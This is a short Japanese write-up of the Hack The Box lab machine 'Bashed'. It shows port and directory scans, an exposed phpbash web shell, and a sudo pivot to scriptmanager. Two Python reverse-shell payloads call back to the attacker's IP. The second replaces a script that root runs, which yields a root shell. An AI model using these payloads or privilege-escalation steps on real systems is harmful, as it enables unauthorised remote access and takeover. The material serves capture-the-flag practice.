見出し画像

HTB Bashed

ただのサラリーマン

ポート探索

nmap

$ nmap -sCV -A -v -Pn -p- --min-rate 5000 10.10.10.68 -oN nmap_result.txt

<<SNIP>>
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
|_http-title: Arrexel's Development Site
<<SNIP>>

80ポート探索


画面
phpbashのデモ画面
$ feroxbuster -u http://10.10.10.68/ -d 2 -C 403,404,500

<<SNIP>>
200      GET        1l      255w     4559c http://10.10.10.68/dev/phpbash.min.php
200      GET      216l      489w     8151c http://10.10.10.68/dev/phpbash.php
200      GET        0l        0w        0c http://10.10.10.68/php/sendMail.php
<<SNIP>>

Privilege Escalation

sudo -l

www-data@bashed:/home/arrexel# sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

Reverse Shell

www-data@bashed:/home# export RHOST="10.10.16.4";export RPORT=9001;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
$ nc -lnvp 9001                                                          
listening on [any] 9001 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.68] 39484
www-data@bashed:/home$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bashed:/home$

scriptmanagerになる

www-data@bashed:/tmp$ sudo -u scriptmanager bash -i
sudo -u scriptmanager bash -i
scriptmanager@bashed:/tmp$ 
scriptmanager@bashed:/tmp$ ls -l /
ls -l /
total 80
drwxr-xr-x   2 root          root           4096 Jun  2  2022 bin
drwxr-xr-x   3 root          root           4096 Jun  2  2022 boot
drwxr-xr-x  19 root          root           4140 Nov 26 15:28 dev
drwxr-xr-x  89 root          root           4096 Jun  2  2022 etc
drwxr-xr-x   4 root          root           4096 Dec  4  2017 home
lrwxrwxrwx   1 root          root             32 Dec  4  2017 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x  19 root          root           4096 Dec  4  2017 lib
drwxr-xr-x   2 root          root           4096 Jun  2  2022 lib64
drwx------   2 root          root          16384 Dec  4  2017 lost+found
drwxr-xr-x   4 root          root           4096 Dec  4  2017 media
drwxr-xr-x   2 root          root           4096 Jun  2  2022 mnt
drwxr-xr-x   2 root          root           4096 Dec  4  2017 opt
dr-xr-xr-x 175 root          root              0 Nov 26 15:27 proc
drwx------   3 root          root           4096 Nov 26 15:30 root
drwxr-xr-x  18 root          root            520 Nov 27 06:25 run
drwxr-xr-x   2 root          root           4096 Dec  4  2017 sbin
drwxrwxr--   2 scriptmanager scriptmanager  4096 Jun  2  2022 scripts
drwxr-xr-x   2 root          root           4096 Feb 15  2017 srv
dr-xr-xr-x  13 root          root              0 Nov 27 12:33 sys
drwxrwxrwt  10 root          root           4096 Nov 27 12:38 tmp
drwxr-xr-x  10 root          root           4096 Dec  4  2017 usr
drwxr-xr-x  12 root          root           4096 Jun  2  2022 var
lrwxrwxrwx   1 root          root             29 Dec  4  2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic
scriptmanager@bashed:/tmp$ cd /scripts
cd /scripts
scriptmanager@bashed:/scripts$ ls -al
ls -al
total 16
drwxrwxr--  2 scriptmanager scriptmanager 4096 Jun  2  2022 .
drwxr-xr-x 23 root          root          4096 Jun  2  2022 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Nov 27 12:38 test.txt

test.pyを書き換える

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.4",9002))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty; pty.spawn("bash")
$ nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.68] 57904
root@bashed:/scripts# ls
ls
test.py  test.txt
root@bashed:/scripts# id
id
uid=0(root) gid=0(root) groups=0(root)
root@bashed:/scripts#

いいなと思ったら応援しよう!